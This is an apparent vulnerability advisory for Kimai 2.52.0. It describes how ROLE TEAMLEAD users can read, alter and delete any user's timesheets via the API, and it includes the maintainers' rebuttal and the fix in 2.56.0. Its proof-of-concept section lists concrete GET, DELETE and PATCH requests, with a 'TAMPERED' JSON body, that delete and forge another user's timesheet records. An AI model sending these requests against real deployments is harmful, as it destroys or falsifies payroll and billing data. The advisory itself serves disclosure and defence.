PT-2026-41485 · Packagist · Kimai/Kimai

Published

2026-05-06

·

Updated

2026-05-06

CVSS v4.0

5.6

Medium

VectorAV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

Summary

Any ROLE TEAMLEAD user can enumerate, read, modify, and permanently delete timesheets belonging to any other user in the system — regardless of team membership. This enables data destruction (deleted billable hours), data tampering (forged timesheet durations), and full authorization bypass on timesheet resources. Verified against Kimai 2.52.0.

Details

TimesheetVoter::voteOnAttribute() maps permissions to own timesheet or other timesheet without checking team membership. The voter's own comment confirms this is a known gap:
php
// extend me for "team" support later on
if ($subject->getUser()?->getId() === $user->getId()) {
  $permission .= 'own';
} else {
  $permission .= 'other';
}

PoC

Tested against Kimai 2.52.0 Docker instance.
Setup:
  • User A (usera, ROLE TEAMLEAD) owns timesheet ID 2 with description "Private timesheet - UserA only"
  • User B (userb, ROLE TEAMLEAD) is NOT on any team with User A
User B reads User A's timesheet data:
GET /api/timesheets/2 HTTP/1.1
X-AUTH-USER: userb
X-AUTH-TOKEN: <userb api token>
Response: HTTP 200 — returns full timesheet record including description "Private timesheet - UserA only".
User B deletes User A's timesheet:
DELETE /api/timesheets/3 HTTP/1.1
X-AUTH-USER: userb
X-AUTH-TOKEN: <userb api token>
Response: HTTP 204 No Content — timesheet permanently deleted.
User B tampers User A's timesheet:
PATCH /api/timesheets/6 HTTP/1.1
X-AUTH-USER: userb
X-AUTH-TOKEN: <userb api token>
Content-Type: application/json

{"begin":"2026-03-24T08:00:00","end":"2026-03-24T18:00:00","project":1,"activity":1,"description":"TAMPERED","exported":false,"billable":false}
Response: HTTP 200 OK — duration inflated from 3600s to 36000s, description overwritten.
Note: ROLE USER (userc) is correctly blocked — DELETE returns 403 and the actions endpoint returns an empty array. The vulnerability only affects ROLE TEAMLEAD and above. Timesheet IDs are sequential integers, trivially enumerable.

Impact

Any authenticated user with ROLE TEAMLEAD or above can:
  1. Permanently delete timesheets belonging to any user system-wide — destroying billable hours, payroll data, and project billing history
  2. Silently alter timesheet descriptions, hours, and billing flags — forging hours up or down, directly affecting invoicing and payroll
  3. Enumerate all timesheet IDs (sequential integers) and access action metadata for arbitrary records
No user interaction required. ROLE USER accounts are correctly restricted; the vulnerability is specific to ROLE TEAMLEAD receiving global scope instead of team-scoped access.

Maintainers answer: why this is not eligible for a CVE

The behavior described matches the documented permission model. Per the Kimai documentation, the relevant permissions granted to ROLE TEAMLEAD are:
  • edit other timesheet — Edit existing records of other users
  • delete other timesheet — Delete existing records of other users
These permissions were global by design, not team-scoped. The UI surfaces only the teamlead's own team timesheets, but the API has historically honored these permissions as documented: a role holding * other timesheet can act on any other user's timesheet. The inline comment // extend me for "team" support later on reflects this accurately — team-scoped enforcement was a planned enhancement, not a security control that existed and failed.
The report frames this as authorization bypass, but no authorization boundary is being crossed: ROLE TEAMLEAD is operating within its documented permissions.
Kimai acknowledges that this behavior might not be expected, so while it will be treated as a feature request for team-scoped permission enforcement and not a vulnerability, it still track it as having security implications.

Solution

Team-scoped timesheet permission checks were added in 2.56.0.
Operators of Kimai <= 2.55 who need stricter isolation between teamleads should not grant ROLE TEAMLEAD to users who must not act on other teams' timesheets.

Fix

Incorrect Authorization

Found an issue in the description? Have something to add? Feel free to write us 👾
dbugs@ptsecurity.com

Weakness Enumeration

CWE-863

Related Identifiers

GHSA-9G2Q-W3W2-VF7Q

Affected Products

Kimai/Kimai